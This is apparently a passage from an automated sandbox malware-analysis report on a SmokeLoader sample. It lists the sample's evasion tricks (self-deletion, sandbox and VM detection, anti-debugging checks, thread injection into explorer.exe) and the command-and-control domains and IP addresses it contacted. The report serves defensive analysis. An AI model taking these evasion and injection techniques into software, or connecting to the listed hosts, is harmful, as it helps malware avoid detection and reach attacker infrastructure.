            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eveggtbJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eveggtbJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\411F.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Deletes itself after installationShow sources
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\uz6feqlix4.exeJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\eveggtb:Zone.Identifier read attributes | delete

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: eveggtb, 0000000B.00000002.781404615.0000000001F80000.00000004.00000001.sdmpBinary or memory string: ASWHOOKZ
            Checks if the current machine is a virtual machine (disk enumeration)Show sources
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\eveggtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\eveggtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\eveggtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\eveggtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\eveggtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\eveggtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Local\Temp\411F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Local\Temp\411F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Local\Temp\411F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Local\Temp\411F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Local\Temp\411F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Local\Temp\411F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Windows\explorer.exe TID: 6804Thread sleep count: 602 > 30
            Source: C:\Windows\explorer.exe TID: 5408Thread sleep count: 386 > 30
            Source: C:\Windows\explorer.exe TID: 5408Thread sleep time: -38600s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6648Thread sleep count: 485 > 30
            Source: C:\Windows\explorer.exe TID: 6648Thread sleep time: -48500s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1576Thread sleep count: 482 > 30
            Source: C:\Windows\explorer.exe TID: 6036Thread sleep count: 398 > 30
            Source: C:\Windows\explorer.exe TID: 6036Thread sleep time: -39800s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6292Thread sleep count: 279 > 30
            Source: C:\Users\user\AppData\Local\Temp\411F.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 602
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 386
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 485
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 482
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 398
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeSystem information queried: ModuleInformation
            Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.688084068.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.695671128.000000000FCE0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
            Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..
            Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAb
            Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$
            Source: explorer.exe, 00000005.00000000.687195483.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 00000005.00000000.726841267.000000000A783000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

            Anti Debugging:

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeSystem information queried: CodeIntegrityInformation
            Source: C:\Users\user\AppData\Roaming\eveggtbSystem information queried: CodeIntegrityInformation
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_00845BDC push dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\eveggtbProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\411F.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 1_1_004027ED LdrLoadDll,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0042C6D0 SetUnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_004283B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\explorer.exeFile created: 411F.exe.5.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: unicupload.top
            Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
            Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
            Source: C:\Windows\explorer.exeDomain query: infinity-cheats.com
            Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
            Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
            Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\eveggtbSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\eveggtbSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeThread created: C:\Windows\explorer.exe EIP: 4F41930
            Source: C:\Users\user\AppData\Roaming\eveggtbThread created: unknown EIP: 4F91930
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeProcess created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
            Source: C:\Users\user\AppData\Roaming\eveggtbProcess created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
            Source: C:\Users\user\AppData\Local\Temp\411F.exeProcess created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
            Source: explorer.exe, 00000005.00000000.717104368.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.686588068.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.700174551.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.721547751.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000005.00000000.692484311.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.711003387.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: _strlen,EnumSystemLocalesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,__invoke_watson_if_error,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,

            Stealing of Sensitive Information:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
